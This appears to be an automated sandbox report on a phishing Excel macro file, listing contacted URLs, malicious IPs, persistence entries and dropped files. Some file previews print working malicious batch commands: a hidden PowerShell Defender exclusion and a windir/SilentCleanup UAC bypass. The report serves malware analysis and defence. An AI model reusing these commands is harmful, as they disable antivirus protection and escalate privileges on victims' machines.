http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.311467202.0000000005461000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.311467202.0000000005461000.00000004.00000001.sdmp	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	bhvDE1F.tmp.36.dr	false		high
http://www.imvu.com	logagent.exe, 00000025.00000002.409992946.0000000000400000.00000040.00000001.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000004.00000002.318468699.0000000006382000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://www.google.com/chrome/static/images/download-browser/pixel_phone.png	bhvDE1F.tmp.36.dr	false		high
https://www.odwebp.svc.ms	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://web.microsoftstream.com/video/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png	bhvDE1F.tmp.36.dr	false		high
https://pki.goog/repository/0	bhvDE1F.tmp.36.dr	false	URL Reputation: safe	unknown
https://graph.windows.net	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.311467202.0000000005461000.00000004.00000001.sdmp	false		high
http://www.msn.com/	bhvDE1F.tmp.36.dr	false		high
https://support.google.com/chrome/?p=plugin_shockwave	logagent.exe, 00000024.00000003.418468317.0000000004EE8000.00000004.00000001.sdmp, logagent.exe, 00000024.00000003.418572041.0000000004EE8000.00000004.00000001.sdmp, logagent.exe, 00000024.00000003.418520549.0000000004EEB000.00000004.00000001.sdmp	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674	bhvDE1F.tmp.36.dr	false		high
https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg	bhvDE1F.tmp.36.dr	false		high
https://ncus.contentsync.	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/fallback/icon-help.jpg	bhvDE1F.tmp.36.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
http://weather.service.msn.com/data.aspx	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
http://crl.pki.goog/gsr2/gsr2.crl0?	bhvDE1F.tmp.36.dr	false	URL Reputation: safe	unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	bhvDE1F.tmp.36.dr	false	URL Reputation: safe	unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-fb.jpg	bhvDE1F.tmp.36.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://wus2.contentsync.	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/ios	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://aefd.nelreports.net/api/report?cat=bingth	bhvDE1F.tmp.36.dr	false	URL Reputation: safe	unknown
https://qcisaa.sn.files.1drv.com/H	Srakjle.exe, 00000027.00000003.431133716.0000000000716000.00000004.00000001.sdmp	false		high
https://o365auditrealtimeingestion.manage.office.com	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21155&authkey=AG_5U-e	Srakjle.exe, 00000027.00000003.431133716.0000000000716000.00000004.00000001.sdmp, Srakjle.exe, 00000027.00000003.437818449.00000000006FD000.00000004.00000001.sdmp, Srakjle.exe, 00000027.00000002.514902670.0000000003850000.00000004.00000001.sdmp	false		high
https://www.google.com/chrome/static/images/homepage/google-canary.png	bhvDE1F.tmp.36.dr	false		high
https://clients.config.office.net/user/v1.0/android/policies	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://qcisaa.sn.files.1drv.com/R	Srakjle.exe, 00000027.00000003.431133716.0000000000716000.00000004.00000001.sdmp	false		high
https://entitlement.diagnostics.office.com	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js	bhvDE1F.tmp.36.dr	false		high
https://www.google.com/chrome/static/js/main.v2.min.js	bhvDE1F.tmp.36.dr	false		high
https://outlook.office.com/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://qcisaa.sn.files.1drv.com/X	Srakjle.exe, 00000027.00000003.431133716.0000000000716000.00000004.00000001.sdmp	false		high
https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg	bhvDE1F.tmp.36.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf	bhvDE1F.tmp.36.dr	false		high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	logagent.exe, 00000025.00000002.409992946.0000000000400000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://storage.live.com/clientlogs/uploadlocation	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://qcisaa.sn.files.1drv.com/y4mpZ4VW86NXXaDrUZ2kx8Gnrgcq2YOm_qNhuCDPNAYjB4S8bwoonF7WAqA6PxADB2f	Srakjle.exe, 00000027.00000002.508261023.0000000000716000.00000004.00000001.sdmp, Srakjle.exe, 00000027.00000003.431166013.0000000000727000.00000004.00000001.sdmp	false		high
https://substrate.office.com/search/api/v1/SearchHistory	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	bhvDE1F.tmp.36.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg	bhvDE1F.tmp.36.dr	false		high
https://graph.windows.net/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0	bhvDE1F.tmp.36.dr	false		high
https://devnull.onenote.com	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://messaging.office.com/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://qcisaa.sn.files.1drv.com/y4mis9sNBIIhaDQ47-lbehmFGRIvDtVnvjDSK1-KaB6lFk5eST5bKR-7qC6KlyhCHcT	bhvDE1F.tmp.36.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://skyapi.live.net/Activity/	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://api.cortana.ai	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173	bhvDE1F.tmp.36.dr	false		high
https://www.google.com/chrome/static/js/installer.min.js	bhvDE1F.tmp.36.dr	false		high
https://visio.uservoice.com/forums/368202-visio-on-devices	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false		high
https://staging.cortana.ai	564D394C-9689-435B-A6D0-3C642CC99840.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png	bhvDE1F.tmp.36.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
192.210.214.221	unknown	United States	36352	AS-COLOCROSSINGUS	true
192.210.214.22	unknown	United States	36352	AS-COLOCROSSINGUS	true
31.3.152.100	twistednerd.dvrlists.com	Sweden	51430	ALTUSNL	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	487588
Start date:	21.09.2021
Start time:	21:33:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	BoFA_Remittance Advice_21219.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	45
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winXLSM@37/21@18/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 19.1% (good quality ratio 17.7%) Quality average: 78.3% Quality standard deviation: 28.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 73 Number of non-executed functions: 129
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.32.63, 52.109.12.23, 52.109.12.21, 23.35.236.56, 20.50.102.62, 173.222.108.210, 173.222.108.226, 13.107.43.13, 13.107.43.12, 40.112.88.60, 20.82.209.183, 80.67.82.235, 80.67.82.211, 13.107.42.13, 13.107.42.12, 20.82.210.154 Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.dc-msedge.net, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, prod.configsvc1.live.com.akadns.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, l-0003.dc-msedge.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, config.officeapps.live.com, europe.configsvc1.live.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:34:25	API Interceptor	25x Sleep call for process: powershell.exe modified
21:34:41	API Interceptor	2x Sleep call for process: filesvr.exe modified
21:35:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Srakjle C:\Users\Public\Libraries\eljkarS.url
21:35:20	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Srakjle C:\Users\Public\Libraries\eljkarS.url
21:35:21	API Interceptor	2x Sleep call for process: Srakjle.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\Public\KDECO.bat Download File
Process:	C:\Users\Public\filesvr.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	4.687076340713226
Encrypted:	false
SSDEEP:	3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
MD5:	213C60ADF1C9EF88DC3C9B2D579959D2
SHA1:	E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
SHA-256:	37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
SHA-512:	FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
Malicious:	false
Reputation:	unknown
Preview:	start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit

C:\Users\Public\Libraries\Srakjle\Srakjle.exe Download File
Process:	C:\Users\Public\filesvr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1133568
Entropy (8bit):	6.333495513346421
Encrypted:	false
SSDEEP:	12288:lIspEfnP8N/seflQTshT8aqeTW39KqyeoAdrL7SUbDz5Zp:320N/seflZhTmiW3AirPzz5Z
MD5:	CF98D2D4D4555323842C8371DB09347E
SHA1:	2BD28F09D3EA7C08BAE3A90DD32C28335488EB43
SHA-256:	8FA72E87ADDEAD9671E573D7CB843CA784A10CFBF6ACF5B6BC4830DF66FE0BF0
SHA-512:	972271FF4B87A3EE8217FD0F13EA9D0464124A117E96B09B6B96F49A7B21CF1076115F6E7BDA753866BDE4CFE9170A0EA7F9EAD75DDA695B3B29150FD29E4849
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B............................l.............@..............................................@..............................f.......&...................0...v........................... .......................................................text.............................. ..`.itext.............................. ..`.data...............................@....bss....,9...............................idata..f*.......,..................@....tls....4................................rdata....... ......................@..@.reloc...v...0...x..................@..B.rsrc....&.......&...&..............@..@.....................L..............@..@................................................................................................

C:\Users\Public\Libraries\eljkarS.url Download File
Process:	C:\Users\Public\filesvr.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Srakjle\\Srakjle.exe">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	96
Entropy (8bit):	4.77898063752017
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMR52XHvsGKd6ov:HRYFVmTWDyzqwHvsbDv
MD5:	F7FE80CDDDABC41175A9174062BF9FB4
SHA1:	EA61F6248EAEF211BD5F08091C691E468161C847
SHA-256:	6B3C535B354D7C67C9A4840F8ACCD2AA9B2DFF80FF3C90BE66D944AA8A8E6F81
SHA-512:	A49CF21FD89CDFB5716BE3BBD38E91073804FB3B66D9F5AC34D0C3E86E2C4563D027986C4A2A2FE33991A2A652FE4DD3578411234B29FB81826079370C7FD926
Malicious:	false
Yara Hits:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\eljkarS.url, Author: @itsreallynick (Nick Carr)
Reputation:	unknown
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Srakjle\\Srakjle.exe"..IconIndex=2..

C:\Users\Public\Trast.bat Download File
Process:	C:\Users\Public\filesvr.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.314972767530033
Encrypted:	false
SSDEEP:	3:LjTnaHF5wlM:rnaHSM
MD5:	4068C9F69FCD8A171C67F81D4A952A54
SHA1:	4D2536A8C28CDCC17465E20D6693FB9E8E713B36
SHA-256:	24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
SHA-512:	A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
Malicious:	false
Reputation:	unknown
Preview:	start /min C:\Users\Public\UKO.bat

C:\Users\Public\UKO.bat Download File
Process:	C:\Users\Public\filesvr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	4.865356627324657
Encrypted:	false
SSDEEP:	6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
MD5:	EAF8D967454C3BBDDBF2E05A421411F8
SHA1:	6170880409B24DE75C2DC3D56A506FBFF7F6622C
SHA-256:	F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
SHA-512:	FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
Malicious:	false
Reputation:	unknown
Preview:	reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..

C:\Users\Public\filesvr.exe Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1133568
Entropy (8bit):	6.333495513346421
Encrypted:	false
SSDEEP:	12288:lIspEfnP8N/seflQTshT8aqeTW39KqyeoAdrL7SUbDz5Zp:320N/seflZhTmiW3AirPzz5Z
MD5:	CF98D2D4D4555323842C8371DB09347E
SHA1:	2BD28F09D3EA7C08BAE3A90DD32C28335488EB43
SHA-256:	8FA72E87ADDEAD9671E573D7CB843CA784A10CFBF6ACF5B6BC4830DF66FE0BF0
SHA-512:	972271FF4B87A3EE8217FD0F13EA9D0464124A117E96B09B6B96F49A7B21CF1076115F6E7BDA753866BDE4CFE9170A0EA7F9EAD75DDA695B3B29150FD29E4849
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B............................l.............@..............................................@..............................f.......&...................0...v........................... .......................................................text.............................. ..`.itext.............................. ..`.data...............................@....bss....,9...............................idata..f*.......,..................@....tls....4................................rdata....... ......................@..@.reloc...v...0...x..................@..B.rsrc....&.......&...&..............@..@.....................L..............@..@................................................................................................

C:\Users\Public\nest Download File
Process:	C:\Users\Public\filesvr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:cvn:cv
MD5:	64120803774747F6A0E65FBF68864DB9
SHA1:	2D19E04E427F41A57A40C45C8E15D7BD7FEFF91F
SHA-256:	4BC0305150E635DF5014B49EFB911171F08137F187564E8EC69148525100498F
SHA-512:	C57320C1EA459F360BDFAECB4F23882B7850A93F894B14C4356FE88B64FE397FF27CA2E9E52EA30484DEEF088AAB8970B98C8E73BB92C397552AA6A02BDAFC64
Malicious:	false
Reputation:	unknown
Preview:	Srakjle..

C:\Users\Public\nest.bat Download File
Process:	C:\Users\Public\filesvr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	53
Entropy (8bit):	4.263285494083192
Encrypted:	false
SSDEEP:	3:LjT9fnMXdemzCK0vn:rZnMXd1CV
MD5:	8ADA51400B7915DE2124BAAF75E3414C
SHA1:	1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
SHA-256:	45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
SHA-512:	9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
Malicious:	false
Reputation:	unknown
Preview:	start /min reg delete hkcu\Environment /v windir /f..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\564D394C-9689-435B-A6D0-3C642CC99840 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	138171
Entropy (8bit):	5.361827622718075
Encrypted:	false
SSDEEP:	1536:rcQIKNveBxA3gBwfnQ9DQW+z2Y34Zli7nXboOidXuE6LWME9:iWQ9DQW+z6Xr1
MD5:	29C6857AAA071573BB1839A48FF8421F
SHA1:	9BFC558060B34CF2DEA58EDA0B60E384BCDC0E3E
SHA-256:	95B830083470888A1B2EAE11D5A672D52F6A50A22EBB1E125D4D4C454BE6FD38
SHA-512:	7C412ACCAEE74B2A7D9C628FA407324D1C9C62825D28D33E21FAFBB416B3F4FE64317D2381A1D6B233086220F62DE32F1AA2072F4EBD04D4D1406F6EE48B5E8C
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-09-21T19:34:00">.. Build: 16.0.14513.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BF36ABCE.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2020:09:11 01:35:47], progressive, precision 8, 1903x846, frames 3
Category:	dropped
Size (bytes):	198279
Entropy (8bit):	7.811897016710375
Encrypted:	false
SSDEEP:	6144:0kA+6vAmW5261qSQMaMFc5K+CkmOvsGh5KAb43eFQ:iVKcn4cqkmOvSuFQ
MD5:	E66ADA3730369F5939A407522345B48A
SHA1:	51A74E309885CF524A51EDC743B39FEA0B98B493
SHA-256:	84F8FE0E48C372C9807E2CA912DA35D3AE023E65291EE0F57EAD403D12204D3C
SHA-512:	681DC651B2BE1E345D220D613DF94CE951AFBB3DCD1E373BC4FC04EC9EAE79888B19AF47AAFC74FD40333DA1A13C8C9CE96B06908A11FE6620ADB061B9163831
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....NExif..MM.*.............................b...........j.(...........1.........r.2...........i.................`.......`....Adobe Photoshop 7.0.2020:09:11 01:35:47............................o...........N.............................................(.....................&........... .......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................9...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..I$.NB.I$...I%)$.IJIZ..T......G..3........Hil..>.0F...C...Mx..J.=<j..{[.6[...im~.v.c.v..%..].:...}.....Ux..J......A..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Srakjlekngtcyxfikcsesbckosunxns[1] Download File
Process:	C:\Users\Public\filesvr.exe
File Type:	data
Category:	dropped
Size (bytes):	844800
Entropy (8bit):	7.998270300086775
Encrypted:	true
SSDEEP:	24576:V0SUUlISC/pYz/bZ5ut74t8Ld/xUjdqJZ:VwUK7cEestxUj0H
MD5:	35CD77E767A6005B26709CE820FB50A6
SHA1:	3322111384C098DFDE8B8CDDF60CA078C642CB35
SHA-256:	4CA74BAB815601FB1A29D46116F084663A9722A403431CE59B9305DF3A86E785
SHA-512:	3A331821D2945E7A49BED2F9638738172FFC2758028DFEF58AAAF4D1DB960B42422A21A308859985CAB993FB4754E162A586CC18BFC09AEBD71290F30E8A2431
Malicious:	false
Reputation:	unknown
Preview:	...].~.g.a........P..O=.........U.....8..q.F....\..k.e..#....A~c.A\..pA^..Z.zZ....".".."....b&..S...?Y......."...f..[.#<.&./6.\|^..Z.zZ....".".."../6...Y...!....0..F...s...K .&.3m....a.F..6..va..S......0.....].k..k.l./e....2...P.../n.[........4............m..G.].4.k.....Y....6.}..:.J....Y.S..,.W.?6.0.. .-e...N..2..%.C:.G>.9.A1...e...l..c....&.].....(.V;`y.Q..I=:.....d.4......z.JBLDR..D"PC.S0.+..._#.x..3."1...2.^.......qsod."&.g.0...I...`...v.....@.k:K.?....;e5..s....y.C...%.....o.\|.J../.....[$,....._+.?.^...+........_1...K.._&.=.....t..>k.A.........?.PBY'.4ur..V.R.....?..g."6wa.W2..h.....$+...M...R.v.O.....c.R..l..f.'aKq.{{wz.r.{....Z.(..m.c...t.m.@qa..%.5.k.Fz..Y/..\|.um...yd.......&._3.:`..=....k........A.DM....A...FT.ye.b......w.;..t..l.$-....h...?...U5...c...v..%.5.k.FS9.R.A....}]...>.Q.FA.x..)..:r..qi.owwus~..I.6oe.v.....=.f.....DY'.O.FTK9.TG..L.._3..=.}_.+...M.....@\|....[....LM.E..S1&.Q&..Z... ?..1.-...~.6O.J.i...S!.R.q`....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Srakjlekngtcyxfikcsesbckosunxns[2] Download File
Process:	C:\Users\Public\Libraries\Srakjle\Srakjle.exe
File Type:	data
Category:	dropped
Size (bytes):	844800
Entropy (8bit):	7.998270300086775
Encrypted:	true
SSDEEP:	24576:V0SUUlISC/pYz/bZ5ut74t8Ld/xUjdqJZ:VwUK7cEestxUj0H
MD5:	35CD77E767A6005B26709CE820FB50A6
SHA1:	3322111384C098DFDE8B8CDDF60CA078C642CB35
SHA-256:	4CA74BAB815601FB1A29D46116F084663A9722A403431CE59B9305DF3A86E785
SHA-512:	3A331821D2945E7A49BED2F9638738172FFC2758028DFEF58AAAF4D1DB960B42422A21A308859985CAB993FB4754E162A586CC18BFC09AEBD71290F30E8A2431
Malicious:	false
Reputation:	unknown
Preview:	...].~.g.a........P..O=.........U.....8..q.F....\..k.e..#....A~c.A\..pA^..Z.zZ....".".."....b&..S...?Y......."...f..[.#<.&./6.\|^..Z.zZ....".".."../6...Y...!....0..F...s...K .&.3m....a.F..6..va..S......0.....].k..k.l./e....2...P.../n.[........4............m..G.].4.k.....Y....6.}..:.J....Y.S..,.W.?6.0.. .-e...N..2..%.C:.G>.9.A1...e...l..c....&.].....(.V;`y.Q..I=:.....d.4......z.JBLDR..D"PC.S0.+..._#.x..3."1...2.^.......qsod."&.g.0...I...`...v.....@.k:K.?....;e5..s....y.C...%.....o.\|.J../.....[$,....._+.?.^...+........_1...K.._&.=.....t..>k.A.........?.PBY'.4ur..V.R.....?..g."6wa.W2..h.....$+...M...R.v.O.....c.R..l..f.'aKq.{{wz.r.{....Z.(..m.c...t.m.@qa..%.5.k.Fz..Y/..\|.um...yd.......&._3.:`..=....k........A.DM....A...FT.ye.b......w.;..t..l.$-....h...?...U5...c...v..%.5.k.FS9.R.A....}]...>.Q.FA.x..)..:r..qi.owwus~..I.6oe.v.....=.f.....DY'.O.FTK9.TG..L.._3..=.}_.+...M.....@\|....[....LM.E..S1&.Q&..Z... ?..1.-...~.6O.J.i...S!.R.q`....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Srakjlekngtcyxfikcsesbckosunxns[2] Download File
Process:	C:\Users\Public\Libraries\Srakjle\Srakjle.exe
File Type:	data
Category:	dropped
Size (bytes):	844800
Entropy (8bit):	7.998270300086775
Encrypted:	true
SSDEEP:	24576:V0SUUlISC/pYz/bZ5ut74t8Ld/xUjdqJZ:VwUK7cEestxUj0H
MD5:	35CD77E767A6005B26709CE820FB50A6
